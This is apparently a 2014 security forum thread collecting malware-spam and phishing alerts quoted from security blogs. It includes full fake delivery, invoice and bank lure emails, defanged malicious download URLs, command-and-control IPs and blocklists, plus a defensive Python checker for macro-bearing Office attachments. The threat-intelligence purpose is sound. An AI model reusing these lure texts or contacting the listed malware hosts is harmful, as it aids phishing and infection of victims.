obtained hundreds of files apparently stolen by the Iranian group from the U.S. Navy's Marine Corps Intranet (NMCI). U.S. government sources had confirmed that Iran was behind the 2013 NMCI breach..."
* http://blog.cylance.com/operation-cleaver-prevention-is-everything
Dec 2, 2014
- http://www.cylance.com/operation-cleaver/?&__hssc=&__hstc&hsCtaTracking=d1078200-8921-49f2-ab9c-6f87b7a0c3ee|25e0e347-ef8e-475e-9c59-4b051299b3ea
___
Fake 'Voice Message from Message Admin' SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/01/fake-emails-voice-message-0174669888-from-message-admin-leads-to-malware/
Dec 1, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Voice Message #0174669888” (number will vary). This email is sent from the -spoofed- address “Message Admin <NoRepse@ voiceservice .com>” and has the following body:
Voice redirected message
hxxp ://www.studio37kriswhite .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 19:06:35 +0000
Voice redirected message
hxp ://thepinkcompany .com/voicemail/listen.php
Sent: Mon, 1 Dec 2014 20:10:47 +0000
The embedded URL leads to a web page with JavaScript that makes use of an ActiveXObject to download the file voice646-872-8712_wav.zip. Once extracted, the 43 kB large file voice646-872-8712_wav.exe is present. The trojan is known as W32.HfsAutoA.631F, Trojan.DownLoader11.46947, UDS:DangerousObject.Multi.Generic, Upatre.FE or BehavesLike.Win32.Backdoor.pz.
The trojan is capable of starting a listening server, making HTTP requests, fingerprinting a system and communicating outbound. A service bowmc.exe will be installed, TCP port 1034 will be opened and connections with the IP on ports 21410 and 21397 will be opened for outbound traffic. At the time of writing, 8 of the 55* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8e3b9d3e0c04be729180a959c167ac3330fb4d3506e6ab5375a1876f2b1f6cca/analysis/1417468098/
... Behavioural information
TCP connections
192.186.219.137: https://www.virustotal.com/en/ip-address/192.186.219.137/information/
UDP communications
91.200.16.56: https://www.virustotal.com/en/ip-address/91.200.16.56/information/
91.200.16.37: https://www.virustotal.com/en/ip-address/91.200.16.37/information/
:mad: :fear::fear:
AplusWebMaster
2014-12-03, 16:45
FYI...
More malware on Crissic Solutions LLC
- http://blog.dynamoo.com/2014/12/more-malware-on-crissic-solutions-llc.html
3 Dec 2014 - "Another bunch of IPs on Crissic Solutions LLC, leading to what appears to be the Angler EK (see this URLquery report*):
167.160.164.102: https://www.virustotal.com/en/ip-address/167.160.164.102/information/
167.160.164.103: https://www.virustotal.com/en/ip-address/167.160.164.103/information/
167.160.164.141: https://www.virustotal.com/en/ip-address/167.160.164.141/information/
167.160.164.142: https://www.virustotal.com/en/ip-address/167.160.164.142/information/
... domains are being exploited (although there will probably be more soon)... Subdomains in use start with one of qwe. or asd. or zxc... Crissic Solutions LLC operates 167.160.160.0/19 which does have some legitimate sites in it, but since I have previously recommended** blocking 167.160.165.0/24 and 167.160.166.0/24 and now with -multiple- servers on 167.160.164.0/24 also compromised then I suspect that temporarily blocking the entire /19 is the way to go."
* http://urlquery.net/report.php?id=1417554412643
** http://blog.dynamoo.com/2014/11/tainted-network-crissic-solutions.html
___
Fake 'Fedex Unable to deliver your item' SPAM - malware
- http://myonlinesecurity.co.uk/fedex-unable-deliver-item-00486182-malware/
3 Dec 2014 - "'FedEx Unable to deliver your item, #00486182' pretending to come from FedEx International Economy with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
FedEx ®
Dear Customer,
We could not deliver your parcel.
Please, open email attachment to print shipment label.
Regards,
Francis Huber,
Delivery Agent.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.
3 December 2014: Label_00486182.zip: Extracts to: Label_00486182.doc.js
Current Virus total detections: 4/55* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8e78a7c9ae488585a690dc8b5f3b6ebafaf8451ec93462810bd632e51e228fd3/analysis/1417611902/
___
Be Wary of ‘Order Confirmation’ Emails
- http://krebsonsecurity.com/2014/12/be-wary-of-order-confirmation-emails/
Dec 3, 2014 - "If you receive an email this holiday season asking you to “confirm” an online e-commerce order or package shipment, please resist the urge to -click- the included -link- or attachment: Malware purveyors and spammers are blasting these missives by the millions each day in a bid to trick people into giving up control over their computers and identities.
'Order confirmation' malware email blasted out by the Asprox spam botnet:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/hd-asprox-600x273.png
Seasonal scams like these are a perennial scourge of the holidays, mainly because the methods they employ are reliably successful. Crooks understand that it’s easier to catch would-be victims off-guard during the holidays. This goes even for people who generally know better than to click on links and attachments in emails that spoof trusted brands and retailers, because this is a time of year when many people are intensely focused on making sure their online orders arrive before Dec. 25:
This Asprox malware email poses as a notice about a wayward package from a WalMart order.
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/wm-asprox-600x308.png
According to Malcovery*, a company that closely tracks email-based malware attacks, these phony “order confirmation” spam campaigns began around Thanksgiving, and use both booby-trapped links and attached files in a bid to infect recipients’ Windows PCs with the malware that powers the Asprox spam botnet. Asprox is a nasty Trojan that harvests email credentials and other passwords from infected machines, turns the host into a zombie for relaying junk email...
Target is among the many brands being spoofed by Asprox this holiday season:
>> http://krebsonsecurity.com/wp-content/uploads/2014/12/tg-asprox-600x373.png
... do not click the embedded links or attachments..."
* http://blog.malcovery.com/blog/asprox-malware-threat-targets-holiday-shoppers
Dec 3, '14
:fear: :mad:
AplusWebMaster
2014-12-04, 18:04
FYI...
Something evil on 46.161.30.0/24
- http://blog.dynamoo.com/2014/12/something-evil-on-4616130024.html
4 Dec 2014 - "The IP address range of 46.161.30.0/24 (KolosokIvan-net) appears to be dedicated purely to providing phone-home servers for TorrentLocker or some other similar malware. In the past, this IP range has hosted various sites which have moved off... There are no legitimate sites in this network range, so I strongly recommend that you -block- the entire 46.161.30.0/24 range."
(More detail at the dynamoo URL above.)
___
Fake 'Quickbooks intuit unpaid invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/quickbooks-intuit-unpaid-invoice-fake-pdf-malware/
4 Dec 2014 - "'Quickbooks intuit unpaid invoice' with a zip attachment pretending to come from Elena.Lin@ intuit .com <Elena.Lin@ quickbooks .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoice and pay this invoice at your earliest convenience. Feel free to contact us if you have any
questions.
Thank you.
4 December 2014 : invoice72.zip: Extracts to: invoice72.scr
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/300feec373535aa4fabfd8a157f1e5afa37af98f6a7d432b50078e16d77480c1/analysis/1417726300/
... Behavioural information
TCP connections
80.248.222.238: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
198.58.84.150: https://www.virustotal.com/en/ip-address/198.58.84.150/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
___
Fake 'FedEx Delivery' confirmation - phishing 419 SCAM
- http://myonlinesecurity.co.uk/fedex-delivery-notification-confirmation-phishing-419-scam/
4 Dec 2014 - "'FedEx Delivery Notification. (Confirmation)' pretending to come from FedEx Courier Delivery <FedExdelivery@ FedEx .com> is a phishing scam. When I first saw these emails start to come in, I thought it was a follow-on to the current malware spreading campaign Fedex Unable to deliver your item, #00486182 malware but no, it is a pure and simple phishing scam trying to get you to voluntarily give your details. It is most likely a 419 scam which will ask for a fee to expedite the delivery. Just look at all the spelling and grammar mistakes in the email, but of course most victims just don’t read emails closely, just blindly follow instructions and do what is asked without thinking. Email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/fedex_delivery_phish.jpg
... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___
Fake Air Canada emails with ticket and flight confirmation leads to malicious ZIP file
- http://blog.mxlab.eu/2014/12/03/new-fake-air-canada-emails-with-ticket-and-flight-confirmation-leads-to-malicious-zip-file/
Dec 3, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
Order #70189189901 successfully – Ticket and flight details
Order #70189101701 paid – E-ticket and flight details
This email is sent from the -spoofed- address “Aircanada .com” <tickets@ aircanada .com>” and has the following body:
Dear client,
Your order has been successfully processed and your credit card charged.
ELECTRONIC TICKET – 70189101701
FLIGHT – QB70189101701CA
DATE / TIME – Dec 4th 2014, 15:30
ARRIVING – Quebec
TOTAL PRICE / 575.00 CAD
Your ticket can be downloaded and printed from the following URL: ...
hxxps ://www.aircanada .com/travelInformation/viewOrderInfo.do?ticket_number=70189101701& view_pdf=yes
For information regarding your order, contact us by visiting our website: ...
Thank you for choosing Air Canada
The embedded URL does -not- point the browser to the real web site address but to hxxp ://ravuol .com/wp-content/plugins/revslider/temp/update_extract/revslider/pdf_ticket_QB70189189901CA.zip. Once this file is extracted you will have the 209 kB file pdf_ticket_QB70189189901CA.pif. The trojan is known as Trojan.MalPack or a variant of Win32/Injector.BQPL. This trojan has the ability to fingerprint the system, start a server listening on the local machine, create Zeus mutexes, install itself to autorun, and modify the local firewall and policies. At the time of writing, 2 of the 52* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8aba09320c5a5844ceb64ef06624eda221578667a1fa59feb3b2c94aabae96fb/analysis/
ravuol .com / 192.232.218.114: https://www.virustotal.com/en/ip-address/192.232.218.114/information/
:mad: :fear:
AplusWebMaster
2014-12-05, 14:49
FYI...
Fake Voicemail SPAM - wav malware
- http://myonlinesecurity.co.uk/stuartclark146-voicemail-message-01438351556night-message-fake-wav-malware/
5 Dec 2014 - "'Voicemail Message (01438351556>Night Message) From:01438351556' pretending to come from stuartclark146@ gmx .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
IP Office Voicemail redirected message
5 December 2014: voicemsg.wav.zip : Extracts to: voicemsg.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a8d7a7b4c76fa4456b2aa0fd0107ef500382075a56b93564af037dd322232a9f/analysis/1417779780/
___
Fake Remittance Advice SPAM
- http://blog.dynamoo.com/2014/12/k-j-watking-co-fake-remittance-advice.html
5 Dec 2014 - "... The spam comes with an Excel spreadsheet which contains a malicious macro.
Some sample spams are as follows:
From: Brenton Glover
Date: 5 December 2014 at 07:20
Subject: Remittance Advice for 430.57 GBP
Please find attached a remittance advice for recent BACS payment.
Any queries please contact us.
Brenton Glover
Senior Accounts Payable Specialist
K J Watking & Co
I have seen two versions of these, neither of which are detected as malicious by any vendors [1] [2]. Each spreadsheet contains a different but similar malicious macro... which then download a binary... Recommended blocklist:
194.146.136.1
84.92.26.50
79.137.227.123
124.217.199.218 "
1] https://www.virustotal.com/en/file/84f5c7cca1d8d0d35dbe541a406a8ff188b46624248c60214f00d91faf219d66/analysis/1417773044/
2] https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417773050/
- http://myonlinesecurity.co.uk/k-j-watking-co-remittance-advice-excel-malware/
5 December 2014 : BAC_002163F.xls (253KB) - Current Virus total detections: 0/55*
* https://www.virustotal.com/en/file/66ed083beb750b7c2d65210607f52ff2136dbdb9b9b89dfe88fdbef3c9cf826e/analysis/1417779426/
5 December 2014 : BAC_644385B.xls (290KB) - Current Virus total detections: 0/55**
** https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417779139/
- http://blog.mxlab.eu/2014/12/05/email-remittance-advice-for-245-58-gbp-contains-malicious-xls-file/
Dec 5, 2014
> https://www.virustotal.com/en/file/367b3c188d2dc322c03de0204c66d4c7217a998c879c9ad471ba8e1f8db6a2c4/analysis/1417768835/
___
Fake Order/Invoice SPAM - malicious .doc attachment
- http://blog.dynamoo.com/2014/12/mathew-doleman-lightmoorhomescouk-spam.html
5 Dec 2014 - "This -spam- came through into my mailbox horribly mangled and needed some assembly to make it malicious (everything was in a Base 64 attachment). After some work it appears to have a malicious Word document attached.
From: Mathew Doleman [order@ lightmoorhomes .co .uk]
Date: 5 December 2014 at 08:32
Subject: Order no. 98348936010
Thank you for using our services!
Your order #98348936010 will be shipped on 08-12-2014.
Date: December 04, 2014
Price: 177.69
Payment method: Credit card
Transaction number: OVFTMZERLXVNPXLPXB
Please find the detailed information on your purchase in the attached file (2014-12-4_12-32-28_98348936010.doc)
Best regards,
Sales Department
Mathew Doleman
+07966 566663
The attachment is 2014-12-4_12-32-28_98348936010.doc which looks like an old-style .DOC file, but is actually a newer format .DOCX document, which is poorly detected by AV vendors* ... Some investigation shows that it contains a malicious macro... The macro downloads a file from http ://hiro-wish .com/js/bin.exe which is completely undetected by any AV vendor** at present... The VirusTotal report** shows it phoning home to:
46.4.232.200 (Dmitry Zheltov / Hetzner, Germany)
Recommended blocklist:
203.172.141.250
46.4.232.200
74.208.11.204
hiro-wish .com "
* https://www.virustotal.com/en/file/cbb8823189d908b7f11f4c51da179a0a43a93da4ecff6e83e2db7ab99a444717/analysis/1417776108/
** https://www.virustotal.com/en/file/e167ed90258a88c8f63338a76d5d92feb6f97702fba6c99e9c3300014fcc08b3/analysis/1417775973/
___
Fake 'Package delivery failed' SPAM - PDF malware
- http://myonlinesecurity.co.uk/package-delivery-failed-fake-pdf-malware/
5 Dec 2014 - "'Package delivery failed' pretending to come from Canada Post with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: Canada Post [mailto:shipping@ canadapost .ca]
Sent: December 5, 2014 2:31
To: e-Bills – [redacted]
Subject: Package delivery failed
Image removed by sender.
Dear customer,
A delivery attempt has been made on December 3rd, 2014.
The delivery failed because nobody was present at the receiver’s address.
Redelivery can be arranged by visiting our nearest office and presenting a printed copy of the shipping invoice.
TRACKING Number: 3765490000465274
Originating from : RICHMOND
The shipping invoice, necessary for the redelivery arrangements can be automatically downloaded by visiting the tracking section, in our website: ...
5 December 2014: canpost_3765490000465274_trk.zip: Extracts to:
canpost_3765490000465274_trk.pif . Current Virus total detections: 5/55*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/45469fa9aa80014b868ac02fc18997fcad8a25ee7b758cd5358897e126c81929/analysis/1417725574/
___
Halifax phish...
- http://myonlinesecurity.co.uk/halifax-phishing/
5 Dec 2014 - "This Halifax phishing attempt starts with an email saying 'Your Account' pretending to come from Halifax <update@halifax .co .uk> and is one of the latest phish attempts to steal your Bank, credit card and personal details. This one only wants your personal details, and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well:
1] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_phish_email.jpg
...
2] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_fake-site.jpg
... the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format..."
:mad: :fear:
AplusWebMaster
2014-12-08, 13:55
FYI...
Fake Invoice SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/soo-sutton-invoice-224245-from-power-ec.html
8 Dec 2014 - "... this -fake- invoice comes with a malicious Word document attached.
From: soo.sutton966@ powercentre .com
Date: 8 December 2014 at 10:57
Subject: INVOICE 224245 from Power EC Ltd
Please find attached INVOICE number 224245 from Power EC Ltd
Attached is one of two Word documents -both- with the name 224245.doc but with slightly different macros. Neither is currently detected by any AV vendors [1] [2]. Inside the DOC is one of two malicious macros... which then downloads an executable from one of the following locations:
http ://aircraftpolish .com/js/bin.exe
http ://gofoto .dk/js/bin.exe
This file is then saved as %TEMP%\CWRSNUYCXKL.exe and currently has zero detections at VirusTotal. The ThreatExpert report shows that it connects to:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1 Internet, US)
According to the Malwr report this executable drops a DLL with a slightly better detection rate of 5/53*.
Recommended blocklist:
203.172.141.250
74.208.11.204
aircraftpolish .com
gofoto .dk "
1] https://www.virustotal.com/en/file/638c38749b79a38a18d641e3b170e7feeebba21ab3b31ca2d98c5abc5832a150/analysis/1418035603/
2] https://www.virustotal.com/en/file/84d0d1b9544ae8862792796a7ef06e5924919c8ac9fe8b1fb495a4e2df98ed22/analysis/
* https://www.virustotal.com/en/file/8826cc73859b551a7f63db428e13924deeb969b45a7ac8d2cc9b6a4018511c88/analysis/1418037172/
- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
8 Dec 2014
___
Fake 'Transaction confirmation' SPAM - doc malware
- http://myonlinesecurity.co.uk/shipping-status-transaction-confirmation-fake-word-doc-malware/
8 Dec 2014 - "'Shipping status: Transaction confirmation' with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subjects include (all having random numbers, senders, sales clerks names, telephone numbers, order numbers and amounts. Most pretend to come from sale@ or order@ < random company> )
Shipping status: Transaction confirmation: 77951286043
Order info: 50664959001
Payment info: 22908714125
Payment confirmation: 6322896965
They look like:
Shipping status: Transaction confirmation: 77951286043
Greetings,
Your order #77951286043 will be shipped on 16.12.2014.
Date: December 08, 2014. 01:27pm
Price: £163.10
Transaction number: 43595D828F1A5A
Please find the detailed information on your purchase in the attached file order2014-12-08_77951286043.zip
Yours truly,
Sales Department
Keisha Konick ...
-or-
Hello,
Your order #50664959001 will be shipped on 17-12-2014.
Date: December 08, 2014. 01:49pm
Price: £181.71
Transaction number: 1E51D75638EEDA4499
Please find the detailed information on your purchase in the attached file item2014-12-08_50664959001.zip
Kind regards,
Sales Department
Sanjuanita Mandeville ...
Every single attachment received so far today (and there are hundreds) has a different file # so it is difficult to get a viable detection rate at Virus total. The zip attachment extracts to another zip & then to a scr file with an icon looking like it is a word doc.
8 December 2014: order2014-12-08_77951286043.zip: Extracts to: sale2014-12-08_97164185939.scr
Current Virus total detections: 3/55* .
8 December 2014: item2014-12-08_24831482215.zip: Extracts to: item2014-12-08_79359848638.scr
Current Virus total detections: 5/55**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/89be5f270a6a3db81b3e0bb84a1bbcfd228d12454eedd7537a5aa38361542f3c/analysis/1418050446/
... Behavioural information
TCP connections
157.56.96.55: https://www.virustotal.com/en/ip-address/157.56.96.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.96: https://www.virustotal.com/en/ip-address/95.101.0.96/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
** https://www.virustotal.com/en/file/8c968020120ca70d9d56102d3576d0d9e562a57413b7d437d9b4019a8a96b02f/analysis/1418050480/
... Behavioural information
TCP connections
191.232.80.55: https://www.virustotal.com/en/ip-address/191.232.80.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.90: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___
Fake HSBC Advising SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/08/fake-email-from-hsbc-advising-service-leads-to-malware/
Dec 8, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Payment Advice – Advice Ref:[GB659898] / CHAPS credits” (number in subject will vary). This email is sent from the spoofed address “HSBC Advising Service <advising.service@ hsbc .com>” and has the following body:
Sir/Madam,
Please download document from dropbox, payment advice is issued at the request of our customer. The advice is or your reference only.
Download link: ...
Yours faithfully,
Global Payments and Cash Management
HSBC ...
In this sample, the embedded URL directs us to hxxp ://paparellalogistica .it/banking/document.php where the file documentXXX.zip (name contains a number that will vary) is downloaded. The trojan is known as Upatre-FAAJ!BADD639EC640, HB_Arkam or Virus.Win32.Heur.c. The trojan will create a new service gtpwz.exe on the system, modify some Windows registry entries and can connect to the IP 62.210.204.149 on ports 33294 and 33321 for outbound traffic. At the time of writing, 5 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/2ed5903942b5299ea69183aa040343338d220b66742c510c0895766fe0b70b9a/analysis/
... Behavioural information
TCP connections
62.210.204.149: https://www.virustotal.com/en/ip-address/62.210.204.149/information/
188.132.235.180: https://www.virustotal.com/en/ip-address/188.132.235.180/information/
UDP communications
208.97.25.20: https://www.virustotal.com/en/ip-address/208.97.25.20/information/
208.97.25.6: https://www.virustotal.com/en/ip-address/208.97.25.6/information/
:fear: :mad:
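Two of the dynamoo posts above make the same point from different angles: the 5 Dec Mathew Doleman attachment is named .doc but is really an OOXML (zip) package, and the 8 Dec Power EC 224245.doc carries one of two VBA macros that download bin.exe. Both are cheap to detect before the document reaches Word. The Python below is an added example written for this page, not code from the poster or the quoted blogs: it sniffs the container type from the magic bytes, reports an extension that lies about the container, and reports VBA presence (vbaProject.bin for OOXML; for legacy OLE2 files, a heuristic search for the _VBA_PROJECT stream name as it is stored in UTF-16LE in the OLE directory, which is an approximation and not a full OLE parse). The sample files are constructed stand-ins, not real malware; the file names are the ones quoted in the posts.

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE2 compound file header
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML packages are ZIP files
LEGACY_EXT = {"doc", "xls", "ppt"}
OOXML_NO_MACRO_EXT = {"docx", "xlsx", "pptx"}
OOXML_MACRO_EXT = {"docm", "xlsm", "pptm", "dotm", "xltm"}
# Heuristic: the VBA project stream name as the OLE directory stores it (UTF-16LE).
OLE_VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")


def container_type(data):
    """Classify by magic bytes, ignoring whatever the file name claims."""
    if data.startswith(OLE_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    return "unknown"


def ooxml_has_vba(data):
    """OOXML keeps macros in a vbaProject.bin part; its mere presence is decisive."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())


def ole_has_vba_heuristic(data):
    """Cheap substring scan for the VBA project stream name (heuristic, not a parse)."""
    return OLE_VBA_MARKER in data


def assess_office_attachment(filename, data):
    """Return a list of findings: extension/container mismatch and macro presence."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = container_type(data)
    out = []
    if kind == "ooxml":
        if ext in LEGACY_EXT:
            out.append("OOXML (zip) content behind legacy ." + ext + " extension")
        if ooxml_has_vba(data):
            out.append("vbaProject.bin present: document carries VBA macros")
            if ext in OOXML_NO_MACRO_EXT:
                out.append("macros in a ." + ext + " name that should not carry them")
    elif kind == "ole2":
        if ext in OOXML_NO_MACRO_EXT | OOXML_MACRO_EXT:
            out.append("OLE2 content behind OOXML ." + ext + " extension")
        if ole_has_vba_heuristic(data):
            out.append("VBA project streams present (heuristic name match)")
    else:
        out.append("not an Office container")
    return out


def build_samples():
    """Constructed stand-ins (not real malware): an OOXML with a macro part behind a
    .doc name, a clean OOXML, and a minimal fake OLE2 blob naming _VBA_PROJECT."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"\x01\x16\x01\x00" + b"\x00" * 32)
    macro_ooxml = buf.getvalue()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
    clean_ooxml = buf.getvalue()
    fake_ole = OLE_MAGIC + b"\x00" * 504 + OLE_VBA_MARKER + b"\x00" * 40
    return {
        "2014-12-4_12-32-28_98348936010.doc": macro_ooxml,
        "report.docx": clean_ooxml,
        "224245.doc": fake_ole,
    }


if __name__ == "__main__":
    for name, blob in build_samples().items():
        print(name, "->", assess_office_attachment(name, blob) or ["clean"])
```

For production use replace the OLE2 heuristic with a real directory walk (the olefile library, or oletools' olevba), which also finds auto-execute entry points such as AutoOpen and Workbook_Open rather than just the presence of a project.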
AplusWebMaster
2014-12-09, 13:29
FYI...
Something evil on 5.196.33.8/29
- http://blog.dynamoo.com/2014/12/something-evil-on-519633829.html
9 Dec 2014 - "This Tweet* from @Kafeine about the Angler EK drew my attention to a small block of OVH UK addresses of 5.196.33.8/29 which appear to be completely dedicated to distributing malware.
Specifically, VirusTotal lists badness on the following IPs:
5.196.33.8: https://www.virustotal.com/en/ip-address/5.196.33.8/information/
5.196.33.9: https://www.virustotal.com/en/ip-address/5.196.33.9/information/
5.196.33.10: https://www.virustotal.com/en/ip-address/5.196.33.10/information/
There are also some doubtful looking IP addresses on 5.196.33.15** which may well have a malicious purpose... suggest that you treat them as malicious.
Recommended blocklist:
5.196.33.8/29 ..."
(Long list at the dynamoo URL at the top of this post.)
* https://twitter.com/kafeine/status/541550193649680385
** https://www.virustotal.com/en/ip-address/5.196.33.15/information/
___
Fake 'UPS Customer Service' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ups-customer-service-fake-pdf-malware/
9 Dec 2014 - "'UPS Customer Service' pretending to come from UPS Customer Service [mailto:upsdi@ ups .com] is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: UPS Customer Service [mailto:upsdi@ ups .com]
Sent: December 9, 2014 11:25
To: [redacted]
Subject: [SPAM] UPS Customer Service
IMPORTANT DELIVERY
Dear [redacted]
You have received an important delivery from UPS Customer Service.
Please pick up the ePackage at the following Web address:
The ePackage will expire on Thursday December 11, 2014, 00:00:00 EDT
…………………………………………………………….
HOW TO PICK UP YOUR ePackage
* If the Web address above is highlighted, click on it to open a browser window. You will automatically be taken to the ePackage.
* If the Web address above is not highlighted, then follow these steps:
– Open a web browser window.
– Copy and paste the entire Web address into the ‘location’ or ‘address’ bar of the browser.
– Press enter.
Once you arrive at the ePackage web page, you can access the attached files and/or private message.
…………………………………………………………….
If you require assistance please contact UPS Customer Service.
Please note: This e-mail was sent from an auto-notification system that cannot accept incoming e-mail. Please do not reply to this message.
This e-mail is intended for the addressee shown. It contains information that is confidential and protected from disclosure. Any review,
dissemination or use of this transmission or its contents by persons or unauthorized employees of the intended organizations is strictly prohibited.
__________________________________
Delivered by UPS ePackage
9 December 2014: ePackage_12092014_42.pdf.zip: Extracts to: ePackage_12092014_42.pdf.scr
Current Virus total detections: 0/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8be655497ded041cc896788e543e5dad24a5dea518f9d869e376948b004c2e71/analysis/1418149697/
... Behavioural information
TCP connections
54.225.211.214: https://www.virustotal.com/en/ip-address/54.225.211.214/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
___
Phishing SCAM - 'Your Email Address Transmitting Viruses'
- http://www.hoax-slayer.com/email-address-transmitting-viruses-phishing.shtml
Dec 9, 2014 - "... The email is -not- from any email administrator or service provider. It is a phishing scam designed to steal your account login details via a fake login form. If you click the link and login on the -fake- site, your email account may be hijacked by criminals and used for spam and scam campaigns... Example:
Subject: Take note [email address removed]: Your email address will be terminated now
Dear [email address removed]
Your email address (removed) has been transmitting viruses to our servers and will be deactivated permanently if not resolved.
You are urgently required to sanitize your email or your access to email services will be terminated
Click here now to scan and sanitize your e-mail account
Note that failure to sanitize your email account immediately will lead to permanent deactivation without warning.
We are very sorry for the inconveniences this might have caused you and we assure you that everything will return to normal as soon as you have done the needful.
Admin
According to this email, which claims - rather vaguely - to be from 'Admin', your email has been transmitting viruses to the sender's servers. The email warns that your account will be deactivated permanently if you do not resolve the issue. The message instructs you to 'urgently' click a link to run a scan and 'sanitize your e-mail account'... Clicking the link takes you to a fraudulent webpage that includes a stolen Norton Antivirus logo and a login box (See screenshot below*). The page instructs you to login with your email address and password to run a 30 second scan. After 'logging in', a 'Please wait - scanning' message will be displayed for a few seconds. Finally, a 'Scan Complete' message will be shown. At this point, you may believe that the viruses have been removed and you have successfully resolved the issue... however, the criminals behind the scam can collect your login details and hijack your real email account. They may use the hijacked account to launch further spam and scam campaigns in your name..."
